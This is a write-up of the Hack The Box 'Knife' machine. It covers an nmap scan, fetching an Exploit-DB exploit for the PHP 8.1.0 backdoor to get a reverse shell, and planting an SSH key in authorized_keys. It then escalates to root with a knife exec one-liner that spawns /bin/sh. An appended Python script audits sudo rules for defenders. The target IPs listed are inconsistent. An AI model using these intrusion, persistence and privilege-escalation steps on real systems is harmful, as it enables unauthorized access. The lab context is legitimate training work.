HTB: Knife


Machine IP: 10.129.139.25
System IP: 10.10.16.12

One of the easiest boxes for a beginner. Just don’t overthink it, and look for vulnerabilities in the things you see on the surface.

Let’s start with network mapper (Nmap)

```
nmap -A -T4 -p- -v 10.129.139.27 -oN ./nmap.txt
```

which outputs the following:

```
Nmap scan report for 10.129.139.27
Host is up (0.26s latency).
Not shown: 65431 closed ports, 102 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Port 80

On inspection I found that it’s running `php 8.1.0`, and a simple Google search landed me on an Exploit-DB link.

We then copy the Python code to our system:

```
wget https://www.exploit-db.com/raw/49933
```

Then, on running the exploit, I provided the IP of the target and boom, we are inside the system :)

Got the reverse shell

Inside `/home/james/user.txt` we got the user flag.

Let’s check `sudo -l`:

```
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
```

But our shell isn’t stable at all :’) so we are not able to navigate properly.

So let’s try logging in via SSH. As we can’t use wget, we need to echo our public key into the authorized_keys file. Note: you first have to generate the key pair.

```
echo "ssh-rsa AAA......." > ~/.ssh/authorized_keys
```

and then SSH in from our machine:

```
ssh -i id_rsa james@10.10.10.242
```

On executing

```
sudo /usr/bin/knife
```

we find this

So we can execute a script

So we basically have to create a script and execute it as root :) What more could we want? Just execute the shell as root.

Now let’s run it to get the root shell

```
sudo knife exec --exec "exec '/bin/sh -i' "
```
root flag

So what we are doing here is executing the line `/bin/sh -i` as the root user, since sudo lets us run knife as root.
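
A defender's view of the `sudo -l` output above, as an added example that is not part of the original writeup: a small Python audit that flags sudo rules which amount to a root shell, such as the unrestricted `/usr/bin/knife` rule. The `CODE_RUNNERS` set, the function name and the second sample rule are assumptions made for illustration.

```python
import re

# Assumed, illustrative set: programs that run caller-supplied code or commands.
# knife is included because `knife exec` evaluates Ruby, as this page shows.
CODE_RUNNERS = {"knife", "ruby", "python3", "perl", "bash", "sh", "vim", "find", "env"}

# One rule line of `sudo -l` output: "(runas) TAG: TAG: cmd, cmd"
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")


def audit_sudo_l(text):
    """Return (command, runas, reasons) for rules that amount to a root shell."""
    findings = []
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # Defaults entries, headers and blank lines
        runas = m["runas"].split(":")[0].strip()
        if runas not in ("root", "ALL"):
            continue
        tags = set(re.findall(r"[A-Z_]+", m["tags"]))
        # Commands are comma-separated; an escaped comma belongs to an argument
        for cmd in re.split(r"(?<!\\),\s*", m["cmds"].strip()):
            path, _, args = cmd.partition(" ")
            reasons = []
            if path == "ALL":
                reasons.append("any command allowed")
            elif path.rsplit("/", 1)[-1] in CODE_RUNNERS and not args:
                # sudoers: a command listed without arguments accepts ANY arguments
                reasons.append("code runner with unrestricted arguments")
            if reasons and "NOPASSWD" in tags:
                reasons.append("no password required")
            if reasons:
                findings.append((cmd, runas, reasons))
    return findings


# Abridged output from this page, plus one constructed low-risk rule (last line).
SAMPLE = r"""Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin
User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
    (root) /usr/bin/systemctl status apache2
"""

if __name__ == "__main__":
    for cmd, runas, reasons in audit_sudo_l(SAMPLE):
        print(f"{cmd} as {runas}: {'; '.join(reasons)}")
```

Restricting the rule to a fixed argument list (or removing it) is what clears the finding; the audit treats a code runner with pinned arguments as out of scope.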

Thanks for reading and stay tuned for similar writeups.

Praddyum Verma
